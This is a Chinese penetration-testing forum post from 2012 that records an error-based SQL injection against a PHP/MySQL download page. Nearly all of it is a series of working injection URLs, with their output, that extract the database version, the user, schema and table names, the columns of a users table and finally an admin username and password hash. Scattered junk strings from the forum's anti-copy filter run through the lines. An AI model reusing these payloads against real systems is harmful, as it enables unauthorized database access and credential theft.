找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1836|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666$ b5 F8 C  Z; m6 Q' A4 t3 S+ K" E
9 W! {6 H+ I: g" I$ h1 l
之前想找个测试 没想到这有 可以测试下做个记录而已 * ~6 k* a% K5 `% D6 U+ ~6 |2 ^: e+ j

+ j% U- D3 n1 {% q* I9 T% hhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
- k/ p0 P" z% O: D1 ?- e* f! @" O: A6 w1 \: S" f1 U6 L5 Y
/data0/htdocs/leqi_new/app/myapp.php
+ G  i6 I8 O: B8 w' q$ Q$ v1 Z
0 r/ l" Y% X8 ~% T 或者" d( G" `2 ]& ~1 D' |8 a
+ J9 W+ ?: X4 k3 y$ ]7 ]2 W
/**********version()**********/ 5.1.49-log2 ^6 n7 t/ t) P6 P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 h& c( y' f9 L# ~9 E
" f4 Q8 R( F0 p& @3 ^+ z
/**********user()**********/  
6 g. ]9 V' W- m$ w( Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 q& M' |& L2 c- _/ |+ ?: x9 i; q  o2 F$ i4 O% a& L
/**********database()**********/  leqi
& Y1 z. {& K' b% e/ S0 H: fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 e* r% b1 |* f- v* y0 D4 l5 Y

' s! |# [# ?8 F# H/**********limit依次递归爆库**********/
' @* Z9 q( G5 ]/ N3 jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 Z, t: A& O( E, r2 E2 p
information_schema
5 b2 }  a8 K+ @* k- u- ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 z' i# Q) e) I& m
leqi
) O: A( |/ ]. n# h  q. {! jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% I- q! r$ x6 }( n
test
+ G7 R- Q" F. a- ]+ p" s7 K. B8 a" }' y, y- ]- q& ~
/**********limit依次递归爆表名**********/
: ^. r; P% [: L7 s+ ~' Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% c. O( {9 ^# xusers
* u$ \; K& q: G5 o& j
& J$ j, ~$ M: g" q- V" }/**********limit依次递归爆字段名**********/* ~# @' P! p" N+ Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- M9 _* ~: P  F# M' `
user_id,username,nickname,passwd,group_id
3 \* V# p4 [- Z# T- H( w* k' [, Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
. b# ?9 f# R$ x$ b% B' h8 y. L; G- c/wapc/5000_0005_003
& I" H4 L. U, z! t11 21
1 ^: s( h* Z" n3 Vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
2 g* b3 Z6 ^% u# F6 w$ \  b: U# e  a/wapc/5000_0005_003
+ h- x: `1 \; g. a8 f# A11 341 351 361
& V6 D! G& L0 O& I) P- f3 [9 R/**********爆数据**********/  I% T7 I" m! u) x$ T1 Y% _  q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%232 W  B' C& S+ B" @2 g: J
admin' W$ `; l' E+ D" {1 c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' a7 C, J# t& N" K' ?, u, |6a8b4574ca231eb8bd52764d4978ffcd' Q5 |) S* `! M
8 X3 |' Q9 F1 a3 l2 {

- A% J/ o) d$ S
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表